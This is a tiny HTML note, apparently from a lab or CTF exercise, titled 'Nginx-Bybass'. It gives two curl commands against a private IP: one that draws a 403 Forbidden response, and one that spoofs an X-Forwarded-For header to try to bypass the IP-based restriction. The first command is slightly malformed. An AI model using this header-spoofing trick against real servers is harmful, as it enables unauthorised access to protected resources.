<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Nginx-Bybass</title>
</head><body>curl -H http://10.194.0.68/.misc/ &nbsp; &lt;----this gives you a 403 forbidden code<br/>
<br/>
<br/>
curl -H 'X-forwarded-for:10.194.0.67' -I http://10.194.0.68/misc/ &nbsp; &lt;----this may be able to bypass the 403 code because of the x forwarded header :)<br/>
<br/>
<br/>
</body></html>